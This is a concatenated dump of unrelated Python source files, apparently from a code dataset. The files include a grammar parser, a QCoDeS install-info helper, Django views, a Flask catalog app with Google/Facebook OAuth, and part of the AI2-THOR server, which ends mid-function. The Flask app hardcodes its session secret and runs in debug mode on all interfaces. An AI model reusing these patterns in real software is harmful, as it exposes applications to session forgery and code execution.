anonterminal = Nonterminal(Types.ANONYMOUS)
expression.Statement(Types.ANONYMOUS, anonterminal)
self._expressions('pipe', 'rparen', anonterminal)
elif token in ['start_single_quote', 'start_double_quote', 'start_triple_quote']:
quote = self._quote()
expression.Statement(Types.TERMINAL, quote)
elif token in ['start_single_bytes', 'start_double_bytes', 'start_triple_bytes']:
byte_quote = self._quote()
expression.Statement(Types.TERMINAL, byte_quote)
elif 'nonterminal' == token:
expression.Statement(Types.NONTERMINAL, value)
elif 'varterminal' == token:
expression.Statement(Types.VARTERMINAL, value)
elif 'backref' == token:
expression.Statement(Types.BACKREFERENCE, value)
elif 'function' == token:
functerminal = Nonterminal(Types.ANONYMOUS)
self._expressions('comma', 'rparen', functerminal)
expression.Statement(Types.FUNCTION, value[1:], functerminal)
elif 'reference' == token:
expression.Statement(Types.REFERENCE, value[1:])
elif 'constant' == token:
expression.Statement(Types.TERMINAL, value)
elif 'start_python_code' == token:
expression.code = self._python_code(nonterminal.name)
elif 'lbracket' == token:
try:
expression.Operation(Types.SLICE, self._slice())
except IndexError:
raise nelly.error('Applying slice to nothing at line %d, column %d', line, col)
elif 'lcurley' == token:
try:
expression.Operation(Types.RANGE, self._range())
except IndexError:
raise nelly.error('Applying range to nothing at line %d, column %d', line, col)
elif 'langle' == token:
expression.Weight(self._weight())
elif 'empty' == token:
pass
else:
raise nelly.error('Unhandled token "%s" at line %d, column %d', token, line, col)
def _quote(self):
# this will always be the quoted value
(token,value,line,col) = self.tokens.Next()
# this will always be the terminal quote
self.tokens.Next()
return value
#
# Slice a string
#
def _slice(self):
front = None
back = None
start = False
(token,value,line,col) = self.tokens.Next()
if 'constant' == token:
front = value
start = True
(token,value,line,col) = self.tokens.Next()
if 'rbracket' == token:
if False == start:
raise nelly.error('Empty slice at line %d, column %d', line, col)
return (front,front+1)
elif 'colon' != token:
raise nelly.error('Missing colon at line %d, column %d', line, col)
(token,value,line,col) = self.tokens.Next()
if 'constant' == token:
back = value
(token,value,line,col) = self.tokens.Next()
elif 'rbracket' != token:
raise nelly.error('Missing ] at line %d, column %d', line, col)
return (front,back)
#
# Repeat a range
#
def _range(self):
lower = 0
upper = 0
(token,value,line,col) = self.tokens.Next()
if 'constant' != token:
raise nelly.error('Missing range at line %d, column %d', line, col)
lower = value
upper = value
(token,value,line,col) = self.tokens.Next()
if 'rcurley' == token:
return (lower,upper)
elif 'comma' != token:
raise nelly.error('Missing comma at line %d, column %d', line, col)
(token,value,line,col) = self.tokens.Next()
if 'constant' == token:
upper = value
else:
raise nelly.error('Missing range at line %d, column %d', line, col)
(token,value,line,col) = self.tokens.Next()
if 'rcurley' != token:
raise nelly.error('Missing } at line %d, column %d', line, col)
if lower > upper:
lower,upper = upper,lower
return (lower,upper)
def _weight(self):
(token,value,line,col) = self.tokens.Next()
if 'constant' != token:
raise nelly.error('Missing weight at line %d, column %d', line, col)
(token,ignore,line,col) = self.tokens.Next()
if 'rangle' != token:
raise nelly.error('Missing > at %d, column %d', line, col)
return value
#
# Compile the Python into a code object
#
def _python_code(self, name):
(token,value,line,col) = self.tokens.Next()
values = [s for s in value.split('\n') if s.strip()] or ['']
# save the whitepsace of the first line
ws = re.compile(r'\s*').match(values[0]).group()
# check indentation
if [s for s in values if not s.startswith(ws)]:
raise nelly.error('Bad indentation in code block at line %d, column %d', line, col)
# strip and rejoin the code
codeblock = '\n'.join(s[len(ws):] for s in values)
# eat the end_python_code token
self.tokens.Next()
try:
return compile(codeblock, '<'+name+'>', 'exec')
except SyntaxError as e:
raise nelly.error('%d: %s: %s', e.lineno, e.msg, repr(e.text))
#
# Include other BNF files
#
def _include(self):
(token,value,line,col) = self.tokens.Next()
# file names are quoted
if token not in ['start_single_quote', 'start_double_quote', 'start_triple_quote']:
raise nelly.error('quoted file path expected')
# get the quoted value
path = self._quote()
# try opening the file in each include directory, ignore errors
content = None
for include_dir in self.pwd[-1:] + self.include_dirs:
try:
fullpath = os.path.join(include_dir, path)
content = open(fullpath, 'r')
logging.debug('Including file %s', repr(fullpath))
break
except:
continue
# if no file was found, throw an error
if None == content:
raise nelly.error('Could not load file %s', repr(path))
# ignore empty file
if not content:
return
# compile it inline
self.Parse(content)
self.pwd.pop()
# restore the current tokens
self.tokens = self.tokens_stack[-1]
#
# Multi-line comments
#
def _comment(self):
# consume and disregard the tokens
while True:
(token,value,line,col) = self.tokens.Next()
if 'start_comment' == token:
self._comment()
if 'end_comment' == token:
return
| 2.671875 | 3 |
qcodes/utils/installation_info.py | zhinst/Qcodes | 1 | 3449 | <filename>qcodes/utils/installation_info.py
"""
This module contains helper functions that provide information about how
QCoDeS is installed and about what other packages are installed along with
QCoDeS
"""
import sys
from typing import Dict, List, Optional
import subprocess
import json
import logging
import requirements
if sys.version_info >= (3, 8):
from importlib.metadata import distribution, version, PackageNotFoundError
else:
# 3.7 and earlier
from importlib_metadata import distribution, version, PackageNotFoundError
import qcodes
log = logging.getLogger(__name__)
def is_qcodes_installed_editably() -> Optional[bool]:
"""
Try to ask pip whether QCoDeS is installed in editable mode and return
the answer a boolean. Returns None if pip somehow did not respond as
expected.
"""
answer: Optional[bool]
try:
pipproc = subprocess.run(['python', '-m', 'pip', 'list', '-e', '--no-index',
'--format=json'],
check=True,
stdout=subprocess.PIPE)
e_pkgs = json.loads(pipproc.stdout.decode('utf-8'))
answer = any([d["name"] == 'qcodes' for d in e_pkgs])
except Exception as e: # we actually do want a catch-all here
log.warning(f'{type(e)}: {str(e)}')
answer = None
return answer
def get_qcodes_version() -> str:
"""
Get the version of the currently installed QCoDeS
"""
return qcodes.version.__version__
def get_qcodes_requirements() -> List[str]:
"""
Return a list of the names of the packages that QCoDeS requires
"""
qc_pkg = distribution('qcodes').requires
if qc_pkg is None:
return []
package_names = [list(requirements.parse(req))[0].name for req in qc_pkg]
return package_names
def get_qcodes_requirements_versions() -> Dict[str, str]:
"""
Return a dictionary of the currently installed versions of the packages
that QCoDeS requires. The dict maps package name to version string.
If an (optional) dependency is not installed the name maps to "Not installed".
"""
req_names = get_qcodes_requirements()
req_versions = {}
for req in req_names:
try:
req_versions[req] = version(req)
except PackageNotFoundError:
req_versions[req] = "Not installed"
return req_versions
| 2.390625 | 2 |
documents/views.py | brandonrobertz/foia-pdf-processing-system | 0 | 3450 | <reponame>brandonrobertz/foia-pdf-processing-system<filename>documents/views.py
from django.shortcuts import render
from django.http import JsonResponse
from .models import FieldCategory
def fieldname_values(request):
if request.method == "GET":
fieldname = request.GET['fieldname']
query = request.GET.get('q')
q_kwargs= dict(
fieldname=fieldname,
)
if query:
q_kwargs['value__icontains'] = query
fc = FieldCategory.objects.filter(
**q_kwargs
).order_by("-count").values('value')
return JsonResponse(list(fc), safe=False)
elif request.method == "POST":
fieldname = request.POST['fieldname']
value = request.POST['value']
fc, created = FieldCategory.objects.get_or_create(
fieldname=fieldname,
value=value
)
return JsonResponse({'status': 'ok'})
def fieldname_value_count(request):
# just let it explode if people don't POST properly
fieldname = request.POST['fieldname']
value = request.POST['value']
fc = FieldCategory.objects.get(
fieldname=fieldname,
value=value
)
fc.count += 1
fc.save()
return JsonResponse({'status': 'ok'})
| 2.34375 | 2 |
tests/test_provider_Mongey_kafka_connect.py | mjuenema/python-terrascript | 507 | 3451 | # tests/test_provider_Mongey_kafka-connect.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:20:11 UTC)
def test_provider_import():
import terrascript.provider.Mongey.kafka_connect
def test_resource_import():
from terrascript.resource.Mongey.kafka_connect import kafka_connect_connector
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.Mongey.kafka_connect
#
# t = terrascript.provider.Mongey.kafka_connect.kafka_connect()
# s = str(t)
#
# assert 'https://github.com/Mongey/terraform-provider-kafka-connect' in s
# assert '0.2.3' in s
| 1.867188 | 2 |
application.py | nicholsont/catalog_app | 0 | 3452 | from flask import Flask, render_template, request, redirect, jsonify, g
from flask import url_for, flash, make_response
from flask import session as login_session
from sqlalchemy import create_engine, asc
from sqlalchemy.orm import sessionmaker
from models import Base, Category, Item, User
from oauth2client.client import flow_from_clientsecrets
from oauth2client.client import FlowExchangeError
import httplib2
import json
import requests
app = Flask(__name__)
# Retrieves client ID's and secrets from the json files
CLIENT_ID = json.loads(open('client_secrets.json', 'r')
.read())['web']['client_id']
APP_ID = json.loads(open('fb_client_secrets.json', 'r')
.read())['web']['app_id']
APP_SECRET = json.loads(open('fb_client_secrets.json', 'r')
.read())['web']['app_secret']
# Connect to Database and create database session
engine = create_engine('sqlite:///catalog.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
# Login handler
@app.route('/login')
def showLogin():
"""JSON API to view entire catalog Information."""
return render_template('login.html')
# Third Party Oauth callback
@app.route('/oauth/<provider>', methods=['POST'])
def oauthLogin(provider):
"""
Retrieves provider to process oauth login.
params:(string) oauth provider
"""
if provider == 'google':
code = request.data
try:
# Upgrade auth code into credentials object
oauth_flow = flow_from_clientsecrets('client_secrets.json',
scope='')
oauth_flow.redirect_uri = 'postmessage'
credentials = oauth_flow.step2_exchange(code)
except FlowExchangeError:
response = make_response(
json.dumps('Failed to upgrade the authorization code.'), 401)
response.headers['Content-Type'] = 'application/json'
return response
# Check for valid access token
access_token = credentials.access_token
url = 'https://www.googleapis.com/oauth2/v1/tokeninfo?' \
'access_token={}'.format(access_token)
h = httplib2.Http()
result = json.loads(h.request(url, 'GET')[1])
# Access token error handling
if result.get('error') is not None:
response = make_response(json.dumps(result.get('error')), 500)
response.headers['Content-Type'] = ' application/json'
return response
# Store access token in session
login_session['provider'] = 'google'
login_session['access_token'] = access_token
login_session['gplus_id'] = credentials.id_token['sub']
# Get user info
userinfo_url = 'https://www.googleapis.com/oauth2/v1/userinfo'
params = {'access_token': login_session['access_token'], 'alt': 'json'}
answer = requests.get(userinfo_url, params=params)
data = json.loads(answer.text)
login_session['username'] = data['name']
login_session['picture'] = data['picture']
login_session['email'] = data['email']
elif provider == 'facebook':
access_token = request.data
url = 'https://graph.facebook.com/oauth/access_token?grant_type=' \
'fb_exchange_token&client_id={}&client_secret={}&' \
'fb_exchange_token={}'.format(APP_ID, APP_SECRET, access_token) # noqa
h = httplib2.Http()
result = json.loads(h.request(url, 'GET')[1])
# Strip expire tag from access token
access_token = result['access_token']
url = 'https://graph.facebook.com/v2.11/me?access_token={}&fields=' \
'name,id,email,picture'.format(access_token) # noqa
h = httplib2.Http()
result = json.loads(h.request(url, 'GET')[1])
# Get user info
data = result
login_session['access_token'] = access_token
login_session['provider'] = 'facebook'
login_session['username'] = data['name']
login_session['email'] = data['email']
login_session['picture'] = data['picture']['data']['url']
login_session['facebook_id'] = data['id']
# Checks if user exists in DB
if getUserID(login_session['email']) is not None:
login_session['user_id'] = getUserID(login_session['email'])
else:
createUser(login_session)
login_session['user_id'] = getUserID(login_session['email'])
# Stores token in session
user = session.query(User).filter_by(email=login_session['email']).first()
token = user.generate_auth_token(600)
login_session['token'] = token
output = ''
output += '<h1>Welcome, {}!</h1>'.format(login_session['username'])
output += '<img src="{}" '.format(login_session['picture'])
output += 'style = "width: 300px; height: 300px; border-radius: 150px;' \
'-webkit-border-radius: 150px;-moz-border-radius: 150px;">'
flash('Now logged in as {}'.format(login_session['username']))
return output
def createUser(login_session):
newUser = User(username=login_session['username'],
email=login_session['email'],
picture=login_session['picture'])
session.add(newUser)
session.commit()
def getUserID(email):
try:
user = session.query(User).filter_by(email=email).one()
return user.id
except:
return None
# Revoke current user's token and reset login_session
@app.route('/logout')
def logout():
if 'provider' in login_session:
if login_session['provider'] == 'google':
del login_session['gplus_id']
if login_session['provider'] == 'facebook':
del login_session['facebook_id']
del login_session['access_token']
del login_session['username']
del login_session['picture']
del login_session['email']
del login_session['token']
flash("You have been successfully logged out.")
return redirect(url_for('showCatalog'))
else:
flash("No user has been logged in.")
return redirect(url_for('showCatalog'))
# JSON APIs to view Category Information.
@app.route('/catalog/JSON')
def catalogJSON():
categories = session.query(Category).all()
items = session.query(Item).order_by(Item.category_id).limit(3)
return jsonify(Categories=[c.serialize for c in categories],
Items=[i.serialize for i in items])
@app.route('/catalog/<category>/JSON')
def catalogCategoryJSON(category):
itemCategory = session.query(Category).filter_by(name=category).first()
items = session.query(Item).filter_by(category_id=itemCategory.id).all()
return jsonify(Categories=[itemCategory.serialize],
Items=[i.serialize for i in items])
@app.route('/catalog/<category>/<item>/JSON')
def categoryItemJSON(category, item):
itemCategory = session.query(Category).filter_by(name=category).first()
item = session.query(Item).filter_by(name=item,
category_id=itemCategory.id).first()
return jsonify(Category=[itemCategory.serialize],
Item=[item.serialize])
# Show all Categories and the latest items
@app.route('/')
@app.route('/catalog')
def showCatalog():
categories = session.query(Category).all()
items = session.query(Item).order_by(Item.category_id).limit(3)
if 'token' not in login_session:
return render_template('publiccatalog.html',
categories=categories, items=items)
else:
return render_template('catalog.html',
categories=categories, items=items)
# Show Items in a category item
@app.route('/catalog/<category>/')
def showCatalogCategory(category):
itemCategory = session.query(Category).filter_by(name=category).first()
items = session.query(Item).filter_by(category_id=itemCategory.id).all()
categories = session.query(Category).all()
if 'token' not in login_session:
return render_template('publiccategory.html',
items=items, category=itemCategory,
categories=categories)
else:
return render_template('category.html', items=items,
category=itemCategory, categories=categories)
# Show an item in a category
@app.route('/catalog/<category>/<item>/')
def showCategoryItem(category, item):
category = session.query(Category).filter_by(name=category).first()
item = session.query(Item).filter_by(name=item,
category_id=category.id).first()
categories = session.query(Category).all()
if 'token' not in login_session:
return render_template('publiccategoryitem.html',
item=item, category=category,
categories=categories)
return render_template('categoryitem.html', item=item,
category=category, categories=categories)
# Create a new item
@app.route('/catalog/category/new/', methods=['GET', 'POST'])
def newCategoryItem():
if 'token' not in login_session:
return redirect('/login')
categories = session.query(Category).all()
user = session.query(User).filter_by(email=login_session['email']).one()
if request.method == 'POST':
category = session.query(Category).filter_by(
name=request.form['category']).first()
newItem = Item(name=request.form['name'],
description=request.form['description'],
category_id=category.id, user_id=user.id)
session.add(newItem)
session.commit()
flash('New Item {} Successfully Added'.format(newItem.name))
return redirect(url_for('showCatalog'))
else:
return render_template('newcategoryitem.html', categories=categories)
# Edit a category item
@app.route('/catalog/<category>/<item>/edit', methods=['GET', 'POST'])
def editCategoryItem(category, item):
if 'token' not in login_session:
return redirect('/login')
user = session.query(User).filter_by(email=login_session['email']).first()
categoryItem = session.query(Category).filter_by(name=category).first()
editedItem = session.query(Item).filter_by(
name=item, category_id=categoryItem.id).first()
categories = session.query(Category).all()
if user.id != editedItem.user_id:
flash('You are not authorized to edit {}.'.format(item))
return redirect(url_for('showCategoryItem', category=categoryItem.name,
item=editedItem.name))
if request.method == 'POST':
if request.form['name']:
editedItem.name = request.form['name']
if request.form['description']:
editedItem.description = request.form['description']
if request.form['category']:
category = session.query(Category).filter_by(
name=request.form['category']).first()
editedItem.category_id = category.id
session.add(editedItem)
session.commit()
flash('Item Successfully Edited')
return redirect(url_for('showCategoryItem',
category=request.form['category'],
item=editedItem.name))
else:
return render_template('editcategoryitem.html',
category=categoryItem.name,
item=editedItem.name, categories=categories,
editedItem=editedItem)
# Delete a category item
@app.route('/catalog/<category>/<item>/delete', methods=['GET', 'POST'])
def deleteCategoryItem(category, item):
if 'token' not in login_session:
return redirect('/login')
user = session.query(User).filter_by(email=login_session['email']).first()
categoryItem = session.query(Category).filter_by(name=category).first()
itemToDelete = session.query(Item).filter_by(
name=item, category_id=categoryItem.id).first()
if user.id != itemToDelete.user_id:
flash('You are not authorized to delete {}.'.format(item))
return redirect(url_for('showCategoryItem', category=categoryItem.name,
item=itemToDelete.name))
if request.method == 'POST':
session.delete(itemToDelete)
session.commit()
flash('Item Successfully Deleted')
return redirect(url_for('showCatalog'))
else:
return render_template('deletecategoryitem.html',
category=categoryItem.name,
item=itemToDelete.name)
if __name__ == '__main__':
app.secret_key = 'N10kuN!'
app.debug = True
app.run(host='0.0.0.0', port=5000)
| 2.46875 | 2 |
noo/impl/utils/__init__.py | nooproject/noo | 2 | 3453 | from .echo import echo, set_quiet
from .errors import NooException, cancel
from .store import STORE, FileStore, Store
__all__ = (
"FileStore",
"NooException",
"Store",
"STORE",
"cancel",
"echo",
"set_quiet",
)
| 1.304688 | 1 |
ai2thor/server.py | aliang8/ai2thor | 1 | 3454 | <filename>ai2thor/server.py<gh_stars>1-10
# Copyright Allen Institute for Artificial Intelligence 2017
"""
ai2thor.server
Handles all communication with Unity through a Flask service. Messages
are sent to the controller using a pair of request/response queues.
"""
import json
import logging
import sys
import os
import os.path
try:
from queue import Empty
except ImportError:
from Queue import Empty
import time
import warnings
from flask import Flask, request, make_response, abort
import werkzeug
import werkzeug.serving
import werkzeug.http
import numpy as np
from enum import Enum
from ai2thor.util.depth import apply_real_noise, generate_noise_indices
logging.getLogger('werkzeug').setLevel(logging.ERROR)
werkzeug.serving.WSGIRequestHandler.protocol_version = 'HTTP/1.1'
MAX_DEPTH = 5000
# get with timeout to allow quit
def queue_get(que):
res = None
while True:
try:
res = que.get(block=True, timeout=0.5)
break
except Empty:
pass
return res
class NumpyAwareEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.generic):
return np.asscalar(obj)
return super(NumpyAwareEncoder, self).default(obj)
class BufferedIO(object):
def __init__(self, wfile):
self.wfile = wfile
self.data = []
def write(self, output):
self.data.append(output)
def flush(self):
self.wfile.write(b"".join(self.data))
self.wfile.flush()
def close(self):
return self.wfile.close()
@property
def closed(self):
return self.wfile.closed
class ThorRequestHandler(werkzeug.serving.WSGIRequestHandler):
def run_wsgi(self):
old_wfile = self.wfile
self.wfile = BufferedIO(self.wfile)
result = super(ThorRequestHandler, self).run_wsgi()
self.wfile = old_wfile
return result
class MultiAgentEvent(object):
def __init__(self, active_agent_id, events):
self._active_event = events[active_agent_id]
self.metadata = self._active_event.metadata
self.screen_width = self._active_event.screen_width
self.screen_height = self._active_event.screen_height
self.events = events
self.third_party_camera_frames = []
# XXX add methods for depth,sem_seg
@property
def cv2img(self):
return self._active_event.cv2img
def add_third_party_camera_image(self, third_party_image_data):
self.third_party_camera_frames.append(read_buffer_image(third_party_image_data, self.screen_width, self.screen_height))
def read_buffer_image(buf, width, height, flip_y=True, flip_x=False, dtype=np.uint8,
flip_rb_colors=False):
im_bytes = np.frombuffer(buf.tobytes(), dtype=dtype) if sys.version_info.major < 3 \
else np.frombuffer(buf, dtype=dtype)
im = im_bytes.reshape(height, width, -1)
if flip_y:
im = np.flip(im, axis=0)
if flip_x:
im = np.flip(im, axis=1)
if flip_rb_colors:
im = im[..., ::-1]
return im
def unique_rows(arr, return_index=False, return_inverse=False):
arr = np.ascontiguousarray(arr).copy()
b = arr.view(np.dtype((np.void, arr.dtype.itemsize * arr.shape[1])))
if return_inverse:
_, idx, inv = np.unique(b, return_index=True, return_inverse=True)
else:
_, idx = np.unique(b, return_index=True)
unique = arr[idx]
if return_index and return_inverse:
return unique, idx, inv
elif return_index:
return unique, idx
elif return_inverse:
return unique, inv
else:
return unique
class Event(object):
"""
Object that is returned from a call to controller.step().
This class wraps the screenshot that Unity captures as well
as the metadata sent about each object
"""
def __init__(self, metadata):
self.metadata = metadata
self.screen_width = metadata['screenWidth']
self.screen_height = metadata['screenHeight']
self.frame = None
self.depth_frame = None
self.normals_frame = None
self.flow_frame = None
self.color_to_object_id = {}
self.object_id_to_color = {}
self.instance_detections2D = None
self.instance_masks = {}
self.class_masks = {}
self.instance_segmentation_frame = None
self.class_segmentation_frame = None
self.class_detections2D = {}
self.process_colors()
self.process_visible_bounds2D()
self.third_party_camera_frames = []
self.third_party_class_segmentation_frames = []
self.third_party_instance_segmentation_frames = []
self.third_party_depth_frames = []
self.third_party_normals_frames = []
self.third_party_flows_frames = []
self.events = [self] # Ensure we have a similar API to MultiAgentEvent
@property
def image_data(self):
warnings.warn("Event.image_data has been removed - RGB data can be retrieved from event.frame and encoded to an image format")
return None
def process_visible_bounds2D(self):
if self.instance_detections2D and len(self.instance_detections2D) > 0:
for obj in self.metadata['objects']:
obj['visibleBounds2D'] = (obj['visible'] and obj['objectId'] in self.instance_detections2D)
def process_colors(self):
if 'colors' in self.metadata and self.metadata['colors']:
for color_data in self.metadata['colors']:
name = color_data['name']
c_key = tuple(color_data['color'])
self.color_to_object_id[c_key] = name
self.object_id_to_color[name] = c_key
def objects_by_type(self, object_type):
return [obj for obj in self.metadata['objects'] if obj['objectType'] == object_type]
def process_colors_ids(self):
if self.instance_segmentation_frame is None:
return
MIN_DETECTION_LEN = 0
self.instance_detections2D = {}
unique_ids, unique_inverse = unique_rows(self.instance_segmentation_frame.reshape(-1, 3), return_inverse=True)
unique_inverse = unique_inverse.reshape(self.instance_segmentation_frame.shape[:2])
unique_masks = (np.tile(unique_inverse[np.newaxis, :, :], (len(unique_ids), 1, 1)) == np.arange(len(unique_ids))[:, np.newaxis, np.newaxis])
#for unique_color_ind, unique_color in enumerate(unique_ids):
for color_bounds in self.metadata['colorBounds']:
color = np.array(color_bounds['color'])
color_name = self.color_to_object_id.get(tuple(int(cc) for cc in color), 'background')
cls = color_name
simObj = False
if '|' in cls:
cls = cls.split('|')[0]
simObj = True
bb = np.array(color_bounds['bounds'])
bb[[1,3]] = self.metadata['screenHeight'] - bb[[3,1]]
if not((bb[2] - bb[0]) < MIN_DETECTION_LEN or (bb[3] - bb[1]) < MIN_DETECTION_LEN):
if cls not in self.class_detections2D:
self.class_detections2D[cls] = []
self.class_detections2D[cls].append(bb)
color_ind = np.argmin(np.sum(np.abs(unique_ids - color), axis=1))
if simObj:
self.instance_detections2D[color_name] = bb
self.instance_masks[color_name] = unique_masks[color_ind, ...]
if cls not in self.class_masks:
self.class_masks[cls] = unique_masks[color_ind, ...]
else:
self.class_masks[cls] = np.logical_or(self.class_masks[cls], unique_masks[color_ind, ...])
def _image_depth(self, image_depth_data, **kwargs):
image_depth = read_buffer_image(image_depth_data, self.screen_width, self.screen_height)
depth_format = kwargs['depth_format']
image_depth_out = image_depth[:,:,0] + image_depth[:,:,1] / np.float32(256) + image_depth[:,:,2] / np.float32(256 ** 2)
multiplier = 1.0
if depth_format != DepthFormat.Normalized:
multiplier = kwargs['camera_far_plane'] - kwargs['camera_near_plane']
elif depth_format == DepthFormat.Millimeters:
multiplier *= 1000
image_depth_out *= multiplier / 256.0
depth_image_float = image_depth_out.astype(np.float32)
if 'add_noise' in kwargs and kwargs['add_noise']:
depth_image_float = apply_real_noise(
depth_image_float,
self.screen_width,
indices=kwargs['noise_indices']
)
return depth_image_float
def add_image_depth_robot(self, image_depth_data, depth_format, **kwargs):
multiplier = 1.0
camera_far_plane = kwargs.pop('camera_far_plane', 1)
camera_near_plane = kwargs.pop('camera_near_plane', 0)
if depth_format == DepthFormat.Normalized:
multiplier = 1.0 / (camera_far_plane - camera_near_plane)
elif depth_format == DepthFormat.Millimeters:
multiplier = 1000.0
image_depth = read_buffer_image(
image_depth_data, self.screen_width, self.screen_height, **kwargs
).reshape(self.screen_height, self.screen_width) * multiplier
self.depth_frame = image_depth.astype(np.float32)
def add_image_depth(self, image_depth_data, **kwargs):
self.depth_frame = self._image_depth(image_depth_data, **kwargs)
def add_third_party_image_depth(self, image_depth_data, **kwargs):
self.third_party_depth_frames.append(self._image_depth(image_depth_data, **kwargs))
def add_third_party_image_normals(self, normals_data):
self.third_party_normals_frames.append(read_buffer_image(normals_data, self.screen_width, self.screen_height))
def add_image_normals(self, image_normals_data):
self.normals_frame = read_buffer_image(image_normals_data, self.screen_width, self.screen_height)
def add_third_party_image_flows(self, flows_data):
self.third_party_flows_frames.append(read_buffer_image(flows_data, self.screen_width, self.screen_height))
def add_image_flows(self, image_flows_data):
self.flows_frame = read_buffer_image(image_flows_data, self.screen_width, self.screen_height)
def add_third_party_camera_image(self, third_party_image_data):
self.third_party_camera_frames.append(read_buffer_image(third_party_image_data, self.screen_width, self.screen_height))
def add_image(self, image_data, **kwargs):
self.frame = read_buffer_image(image_data, self.screen_width, self.screen_height, **kwargs)
def add_image_ids(self, image_ids_data):
self.instance_segmentation_frame = read_buffer_image(image_ids_data, self.screen_width, self.screen_height)
self.process_colors_ids()
def add_third_party_image_ids(self, image_ids_data):
self.third_party_instance_segmentation_frames.append(read_buffer_image(image_ids_data, self.screen_width, self.screen_height))
def add_image_classes(self, image_classes_data):
self.class_segmentation_frame = read_buffer_image(image_classes_data, self.screen_width, self.screen_height)
def add_third_party_image_classes(self, image_classes_data):
self.third_party_class_segmentation_frames.append(read_buffer_image(image_classes_data, self.screen_width, self.screen_height))
def cv2image(self):
warnings.warn("Deprecated - please use event.cv2img")
return self.cv2img
@property
def cv2img(self):
return self.frame[...,::-1]
@property
def pose(self):
agent_meta = self.metadata['agent']
loc = agent_meta['position']
rotation = round(agent_meta['rotation']['y'] * 1000)
horizon = round(agent_meta['cameraHorizon'] * 1000)
return (round(loc['x'] * 1000), round(loc['z'] * 1000), rotation, horizon)
@property
def pose_discrete(self):
# XXX should have this as a parameter
step_size = 0.25
agent_meta = self.metadata['agent']
loc = agent_meta['position']
rotation = int(agent_meta['rotation']['y'] / 90.0)
horizon = int(round(agent_meta['cameraHorizon']))
return (int(loc['x'] / step_size), int(loc['z'] / step_size), rotation, horizon)
def get_object(self, object_id):
for obj in self.metadata['objects']:
if obj['objectId'] == object_id:
return obj
return None
class MultipartFormParser(object):
@staticmethod
def get_boundary(request_headers):
for h, value in request_headers:
if h == 'Content-Type':
ctype, ct_opts = werkzeug.http.parse_options_header(value)
boundary = ct_opts['boundary'].encode('ascii')
return boundary
return None
def __init__(self, data, boundary):
self.form = {}
self.files = {}
full_boundary = b'\r\n--' + boundary
view = memoryview(data)
i = data.find(full_boundary)
while i >= 0:
next_offset = data.find(full_boundary, i + len(full_boundary))
if next_offset < 0:
break
headers_offset = i + len(full_boundary) + 2
body_offset = data.find(b'\r\n\r\n', headers_offset)
raw_headers = view[headers_offset: body_offset]
body = view[body_offset + 4: next_offset]
i = next_offset
headers = {}
for header in raw_headers.tobytes().decode('ascii').strip().split("\r\n"):
k,v = header.split(':')
headers[k.strip()] = v.strip()
ctype, ct_opts = werkzeug.http.parse_options_header(headers['Content-Type'])
cdisp, cd_opts = werkzeug.http.parse_options_header(headers['Content-disposition'])
assert cdisp == 'form-data'
if 'filename' in cd_opts:
if cd_opts['name'] not in self.files:
self.files[cd_opts['name']] = []
self.files[cd_opts['name']].append(body)
else:
if ctype == 'text/plain' and 'charset' in ct_opts:
body = body.tobytes().decode(ct_opts['charset'])
if cd_opts['name'] not in self.form:
self.form[cd_opts['name']] = []
self.form[cd_opts['name']].append(body)
class DepthFormat(Enum):
Meters = 0,
Normalized = 1,
Millimeters = 2
class Server(object):
def __init__(
self,
request_queue,
response_queue,
host,
port=0,
threaded=False,
depth_format=DepthFormat.Meters,
add_depth_noise=False,
width=300,
height=300
):
app = Flask(__name__,
template_folder=os.path.realpath(
os.path.join(
os.path.dirname(os.path.abspath(__file__)), '..', 'templates')))
self.image_buffer = None
self.app = app
self.client_token = None
self.subscriptions = []
self.app.config.update(PROPAGATE_EXCEPTIONS=False, JSONIFY_PRETTYPRINT_REGULAR=False)
self.port = port
self.last_rate_timestamp = time.time()
self.frame_counter = 0
self.debug_frames_per_interval = 50
self.xwindow_id = None
self.wsgi_server = werkzeug.serving.make_server(host, self.port, self.app, threaded=threaded, request_handler=ThorRequestHandler)
# used to ensure that we are receiving frames for the action we sent
self.sequence_id = 0
self.last_event = None
self.camera_near_plane = 0.1
self.camera_far_plane = 20.0
self.depth_format = depth_format
self.add_depth_noise = add_depth_noise
self.noise_indices = None
if add_depth_noise:
assert width == height,\
"Noise supported with square dimension images only."
self.noise_indices = generate_noise_indices(width)
@app.route('/ping', methods=['get'])
def ping():
return 'pong'
@app.route('/train', methods=['post'])
def train():
if request.headers['Content-Type'].split(';')[0] == 'multipart/form-data':
form = MultipartFormParser(request.get_data(), MultipartFormParser.get_boundary(request.headers))
metadata = json.loads(form.form['metadata'][0])
token = form.form['token'][0]
else:
form = request
metadata = json.loads(form.form['metadata'])
token = form.form['token']
if self.client_token and token != self.client_token:
abort(403)
if self.frame_counter % self.debug_frames_per_interval == 0:
now = time.time()
# rate = self.debug_frames_per_interval / float(now - self.last_rate_timestamp)
self.last_rate_timestamp = now
# import datetime
# print("%s %s/s" % (datetime.datetime.now().isoformat(), rate))
if metadata['sequenceId'] != self.sequence_id:
raise ValueError("Sequence id mismatch: %s vs %s" % (
metadata['sequenceId'], self.sequence_id))
events = []
for i, a in enumerate(metadata['agents']):
e = Event(a)
image_mapping = dict(
image=e.add_image,
image_depth=lambda x: e.add_image_depth(
x,
depth_format=self.depth_format,
camera_near_plane=self.camera_near_plane,
camera_far_plane=self.camera_far_plane,
add_noise=self.add_depth_noise,
noise_indices=self.noise_indices
),
image_ids=e.add_image_ids,
image_classes=e.add_image_classes,
image_normals=e.add_image_normals,
image_flows=e.add_image_flows
)
for key in image_mapping.keys():
if key in form.files:
image_mapping[key](form.files[key][i])
third_party_image_mapping = dict(
image=e.add_image,
image_thirdParty_depth=lambda x: e.add_third_party_image_depth(
x,
depth_format=self.depth_format,
camera_near_plane=self.camera_near_plane,
camera_far_plane=self.camera_far_plane
),
image_thirdParty_image_ids=e.add_third_party_image_ids,
image_thirdParty_classes=e.add_third_party_image_classes,
image_thirdParty_normals=e.add_third_party_image_normals,
image_thirdParty_flows=e.add_third_party_image_flows
)
if a['thirdPartyCameras'] is not None:
for ti, t in enumerate(a['thirdPartyCameras']):
for key in third_party_image_mapping.keys():
if key in form.files:
third_party_image_mapping[key](form.files[key][ti])
events.append(e)
if len(events) > 1:
self.last_event = event = MultiAgentEvent(metadata['activeAgentId'], events)
else:
